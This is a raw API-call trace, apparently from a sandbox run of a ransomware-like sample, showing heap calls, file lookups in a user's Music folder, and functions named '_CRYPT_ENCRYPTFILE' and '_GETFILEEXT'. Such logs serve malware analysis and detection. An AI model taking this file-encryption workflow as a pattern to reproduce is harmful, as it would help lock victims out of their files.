[0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=48, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=48, lpWideCharStr=0x87a9d8, cchWideChar=48 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3") returned 48 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.881] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.882] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.882] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.882] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.882] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.882] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.883] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.884] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.884] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.884] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.884] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.885] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.885] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.885] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x9c1fc00, ftLastWriteTime.dwHighDateTime=0x1d5b6c8, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 0x7c20c0 [0037.885] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.886] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x9c1fc00, ftLastWriteTime.dwHighDateTime=0x1d5b6c8, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 0x7c20c0 [0037.886] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.886] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SIWN.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.887] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.887] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.888] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: 